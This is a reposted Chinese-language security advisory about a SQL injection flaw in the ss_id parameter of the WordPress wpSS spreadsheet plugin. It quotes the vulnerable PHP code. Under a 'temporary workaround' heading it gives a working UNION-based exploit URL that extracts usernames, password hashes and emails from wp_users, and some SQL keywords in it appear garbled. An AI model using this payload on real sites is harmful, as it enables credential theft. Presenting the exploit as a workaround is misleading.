WordPress wpSS插件ss_id参数SQL注入漏洞

    [多云 May 2, 2008 10:59 | by ]
来源:Hack57
受影响系统:
WordPress wpSS <= 0.6 v
不受影响系统:
WordPress wpSS 0.62

描述:

--------------------------------------------------------------------------------
BUGTRAQ  ID: 28894
wpSS是WordPress中所使用的电子表格插件,允许在WordPress博客中嵌入交互式的电子表格。
wpSS插件的wpSS/ss_load.php文件中没有正确地过滤对ss_id参数的数便用在了SQL查询中:
ss_load.php
$id = $_GET[′ss_id′];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
if ($wpdb->query("CT * $table_name id=′$id′") == 0) {
....
这允许远程攻击者通过注入任意SQL代码操控SQL查询,导致执行任意代码。
<*来源:1ten0.0net1
链接:http://secunia.com/advisories/29938/
*>

建议:

--------------------------------------------------------------------------------

临时解决方法:

http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+ct+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4++wp_users--&display=plain
厂商补丁:
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://timrohrer.com/blog/?page_id=71
本文来源于Hacker ART http://hacker57.com , 原文地址: http://hacker57.com/wordpress-wpss.html
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(7669)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive